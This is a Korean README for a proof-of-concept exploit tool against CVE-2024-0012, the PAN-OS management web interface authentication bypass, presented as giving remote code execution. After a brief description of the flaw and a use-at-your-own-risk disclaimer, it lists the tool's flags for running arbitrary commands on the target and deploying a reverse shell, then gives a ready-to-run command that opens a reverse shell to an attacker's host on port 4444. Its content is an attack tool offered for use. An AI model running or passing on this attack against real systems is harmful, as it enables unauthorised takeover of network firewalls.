
CVE-2024-0012 PAN-OS: 관리 웹 인터페이스의 인증 우회 (PAN-SA-2024-0015) RCE POC
CVE-2024-0012는 Palo Alto Networks PAN-OS 소프트웨어의 인증 우회 취약점으로, 관리 웹 인터페이스에 네트워크 접근이 가능한 인증되지 않은 공격자가 PAN-OS 관리자 권한을 획득하여 관리 작업을 수행하고, 설정을 조작하거나 다른 인증된 권한 상승 취약점을 악용할 수 있게 합니다.

| ❗ 면책 조항 |
|---|
| 이 프로젝트는 기본적으로 독립형 CLI 도구로 사용되도록 제작되었습니다. 이 익스플로잇을 서비스로 실행하면 보안 위험이 발생할 수 있습니다. 주의하여 사용하고 추가 보안 조치를 적용하는 것이 좋습니다. DWYOR |
python3 cve-2024-0012.py -h
도움말이 표시됩니다. 지원되는 모든 스위치는 다음과 같습니다.
Usage:
python3 cve-2024-0012.py [flags]
Flags:
-h, --help 도움말 메시지 표시 후 종료
--url URL 대상 베이스 URL (http:// 또는 https://)
--no-verify SSL 검증 비활성화
--timeout TIMEOUT 요청 시간 제한(초)
--command COMMAND 대상에서 실행할 명령어
--reverse-shell 대상에 리버스 셸 배포
--lhost LHOST 리버스 셸 연결을 위한 로컬 호스트 (리버스 셸 필요)
--lport LPORT 리버스 셸 연결을 위한 로컬 포트 (리버스 셸 필요)
리버스 셸 명령어.
python3 cve-2024-0012.py --url "http://target.url" --no-verify --reverse-shell --lhost "your-ip" --lport 4444